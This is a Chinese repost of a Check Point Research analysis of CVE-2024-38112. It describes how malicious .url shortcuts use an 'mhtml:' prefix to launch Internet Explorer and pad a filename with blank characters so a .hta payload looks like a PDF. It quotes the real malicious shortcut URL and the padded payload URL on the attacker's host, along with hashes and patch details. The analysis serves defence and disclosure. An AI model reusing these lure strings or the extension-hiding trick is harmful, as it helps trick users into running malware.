复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

admin 2024年9月23日15:13:26评论29 views字数 5058阅读16分51秒阅读模式
复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

29

廿七

30

廿八

1

国庆节

2

三十

3

九月

4

初二

5

初三

6

初四

7

初五

8

寒露

9

初七

10

初八

11

重阳节

12

初十

•2024 年国庆放假时间•

10月1日至10月7日放假,共7天
9月29日(周日)、10月12日(周六)补班

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

简介和背景

Check Point Research 最近发现,威胁行为者一直在使用新颖的(或以前未知的)技巧来引诱 Windows 用户进行远程代码执行。具体来说,攻击者使用特殊的 Windows Internet 快捷方式文件(.url 扩展名),单击该文件时会调用已退役的 Internet Explorer (IE) 来访问攻击者控制的 URL。在 IE 上还使用了另一种技巧来隐藏恶意的 .hta 扩展名。通过使用 IE 而不是 Windows 上更安全的现代 Chrome/Edge 浏览器打开 URL,攻击者在利用受害者的计算机方面获得了显著优势,尽管该计算机运行的是现代的 Windows 10/11 操作系统。

从技术背景来看,  威胁行为者使用 .url 文件作为初始攻击媒介的情况并不少见。甚至以前也发生过使用新型或零日 url 文件相关漏洞的情况——去年 11 月刚刚修补的CVE-2023-36025就是一个很好的例子。

我们发现的恶意 .url 样本最早可以追溯到 2023 年 1 月 (一年多前),最晚可以追溯到 2024 年 5 月 13 日 (截至撰写本文时,仅几天前)。这表明威胁行为者已经使用这些攻击技术一段时间了。

通过“mhtml”技巧复活 Internet Explorer

让我们使用 Virus Total 上的最新 .url样本作为示例来解释该技术。

样本内容:

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 1:恶意 .url 样本的内容

我们可以看到,.url 文件的最后几行字符串指向 Microsoft Edge 应用程序文件中的自定义图标msedge.exe。这会使它看起来指向 PDF 文件(但事实上并非如此)。

重要的是,我们可以看到,关键字的值URL与通常的值有很大不同 - 通常,对于常见的 .url 文件,URL参数看起来像URL=https://www.google.com指向 URL https://www.google.com。但在这个示例中,该值为:

mhtml:http: //cbmelipilla.cl/te/test1.html !x-usc:http://cbmelipilla.cl/te/test1.html

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html

它使用了一个特殊的前缀mhtml:,并且!x-usc:中间还有一个。

几年前,我们在臭名昭著的 CVE-2021-40444 零日攻击中看到了同样的技巧(我们称之为“mhtml”技巧) ,其中文件document.xml.rels包含完全相同的字符串。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图2:CVE-2021-40444漏洞样本中的关键内容

我们知道,在利用 CVE-2021-40444 漏洞时,Word 文档中曾使用过“mhtml”技巧,现在我们看到在 .url 文件中也使用了相同的技巧。那么,攻击者可以利用这个技巧实现什么呢?让我们做一些测试。

如果我们将样本重命名为Books_A0UJKO.pdf.url(野外名称),.url 文件在(完全修补的)Windows 11 上将如下所示 - 显示为指向 PDF 文件的链接。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 3:恶意 .url 文件在 Windows 11 上显示为 PDF 文件的链接

如果我们像受害者一样操作(我们想要打开 PDF),我们双击快捷方式文件。然后,受害者将得到以下内容:

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 4:受害者双击 .url 文件时,IE 和升级窗口对话框出现

看到有什么奇怪的地方了吗? Internet Explorer 打开了。事实上,通过一些调试技巧,我们能够确认 IE 确实被用来打开http://cbmelipilla[.]cl/te/test1.html.url 文件中指定的链接。

众所周知,微软几年前就宣布 IE 退役 。在典型的 Windows 10/11 上,正常的用户操作不应该能够打开 IE 来访问网站,因为它们不具备与现代浏览器相同的安全级别。IE 是一款过时的网络浏览器,以不安全而闻名——这是微软用现代且更安全的 Microsoft Edge 取代它的重要原因之一,或者用户只需安装并使用 Google 的 Chrome 浏览器即可。

免责声明:尽管 IE 已被宣布“退役并停止支持”,但从技术上讲,IE 仍然是 Windows 操作系统的一部分,并且“本质上并不不安全,因为 IE 仍然提供安全漏洞服务,并且应该没有已知的可利用的安全漏洞”,根据我们与微软的沟通。

因此,默认情况下,用户不应使用 IE 打开网站,除非用户明确要求并且用户完全知情。

然而,在这个样本中,使用“mhtml”技巧,当受害者打开.url 快捷方式时(受害者认为他/她正在打开 PDF),攻击者控制的网站是使用 IE 打开的,而不是典型的 Chrome/Edge。

从那里(使用 IE 打开网站),攻击者可以做很多坏事,因为 IE 不安全且过时。例如,如果攻击者有一个 IE 零日漏洞(与 Chrome/Edge 相比更容易找到),攻击者可以攻击受害者以立即获得远程代码执行。然而,在我们分析的样本中,威胁行为者没有使用任何 IE 远程代码执行漏洞。相反,他们使用了 IE 中的另一个技巧(据我们所知,以前可能不为公众所知)来诱骗受害者获得远程代码执行。

额外的 IE 技巧 – 隐藏 .hta 扩展名

让我们再次回顾上图(下面突出显示)。根据提升的(IE)对话框,它似乎要求用户打开一个名为的 PDF 文件Books_A0UJKO.pdf

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 5:仔细查看 IE 对话框 - 仅显示 PDF 文件名

然而,这是真实情况吗?你认为你打开的是 PDF 吗?

不是的。如果我们在上面的 IE 对话框中单击“打开”(默认选项),我们将得到另一个弹出的对话框(见下文)。这是由于 IE 的保护模式(相对较弱的浏览器沙盒)。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 6:IE 保护模式警告对话框

如果受害者继续忽略警告(因为受害者认为他/她正在打开 PDF),受害者的机器最终将被黑客入侵——“打开”的文件实际上是正在下载和执行的恶意 .hta 文件。

如果我们仔细观察 HTTP 流量,我们会发现字符串末尾附加了许多不可打印的字符Books_A0UJKO.pdf。最后是 .hta 字符串——这是真正的(也是危险的)扩展名。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
图 7:显示所访问完整 URI 的 HTTP 流量

这正是 IE 对话框不向用户显示 .hta 文件名的原因。真正的完整 URL 是:

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E 2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0 %80%E2%A0%80.hta

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8 0%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%8 0%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80% E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta

利用这种技巧,攻击者可以更成功地引诱受害者继续执行操作,而事实上受害者正在下载并执行危险的 .hta 应用程序。

bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0 b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104 6514 2c8f490839a60f4907ab8f28dd9db4258e1cfab2d48e89437ef2188a6e94 bfd59ed369057c325e517b22be505f42d60916a47e8bdcbe690210a3087d466d 22e2d84c2a9525e8c6a825fb53f2f30621c5e6c68b1051432b1c5c625ae46f8c c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae

防御与缓解

我们已经确认,所讨论的利用技巧 - 已在野外积极使用了至少一年 - 适用于最新的 Windows 10/11 操作系统。

在本文发布数月前,Check Point 已为我们的客户发布了针对 IPS 和 Harmony Email 的以下保护措施,IPS 签名名为“Internet 快捷方式文件远程代码执行”,以防范此零日攻击。

Harmony Email and Collaboration 以最高安全级别提供针对此类零日攻击的全面内联保护。

我们于 2024 年 5 月 16 日星期四向 Microsoft 安全响应中心 (MSRC) 报告了我们的发现。从那时起,双方就此事密切合作,最终 Microsoft 于 7 月 9 日发布了官方补丁 (CVE-2024-38112)。强烈建议 Windows 用户尽快应用该补丁。

对于担心的 Windows 用户,我们建议特别警惕来自不受信任来源的 .url 文件。正如我们所讨论的,这种类型的攻击需要一些警告(用户交互)才能成功。

Check Point Research 持续监控全球范围内与此类攻击相关的活动。

[7月16日更新]

我们从微软了解到,我们的研究实际上已经产生了两个补丁,而不仅仅是之前报道的 CVE-2024-38112。微软针对我们的发现发布了另一个“纵深防御”补丁。请参阅 MSRC 与我们分享的以下官方确认(也可以通过一些搜索关键字在https://msrc.microsoft.com/update-guide/acknowledgement找到)。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

正如我们所讨论的,我们在这些攻击中发现了两个零日漏洞技巧。因此,我们猜测 CVE-2024-38112 用于修补 IE 中的“隐藏 .hta 扩展名”技巧,而这个“纵深防御”补丁(无 CVE-ID)用于取消注册 .url 文件中的“mhtml”句柄。我们的分析表明,安装 7 月补丁后,如果受害者单击恶意 .url 文件,将出现以下对话框,这确保 IE 不会再通过“mhtml”技巧从恶意 .url 文件打开。

复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

[更新结束]

结论

从漏洞利用的角度总结一下这些攻击:这些活动中使用的第一种技术是“mhtml”技巧,它允许攻击者调用 IE,而不是更安全的 Chrome/Edge。第二种技术是 IE 技巧,让受害者相信他们正在打开 PDF 文件,而事实上,他们正在下载和执行一个危险的.hta应用程序。这些攻击的总体目标是让受害者相信他们正在打开 PDF 文件,而这可以通过使用这两种技巧来实现。

原文始发于微信公众号(OSINT研习社):复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日15:13:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复活IE:黑客利用 Internet 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)http://cn-sec.com/archives/3197478.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息